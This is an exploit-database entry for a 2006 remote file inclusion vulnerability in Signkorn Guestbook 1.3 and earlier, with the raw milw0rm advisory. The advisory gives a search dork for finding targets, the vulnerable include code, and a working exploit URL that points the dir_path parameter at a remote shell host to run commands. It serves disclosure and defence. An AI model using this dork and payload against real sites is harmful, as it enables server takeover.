header-logo
Suggest Exploit
vendor:
Signkorn Guestbook
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Signkorn Guestbook
Affected Version From: 1.1
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit

Signkorn Guestbook version 1.3 and all versions below are vulnerable to a Remote File Inclusion vulnerability. The vulnerable code is located in the includes/log.inc.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the dir_path parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Signkorn Guestbook.
Source

Exploit-DB raw data:

#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip      
#                                                                      
#Version : v1.3 & all versions bellow                                            
#                                                        
#================================================================================================
#
#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
#
#================================================================================================
#Bug in : includes/log.inc.php
#
#Vlu Code :
#--------------------------------
#      if ($_SESSION['permission'] == "yes") {
#  
#    // ########### Admin Menu #############
#    include($dir_path . '/includes/admin.menu.inc.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]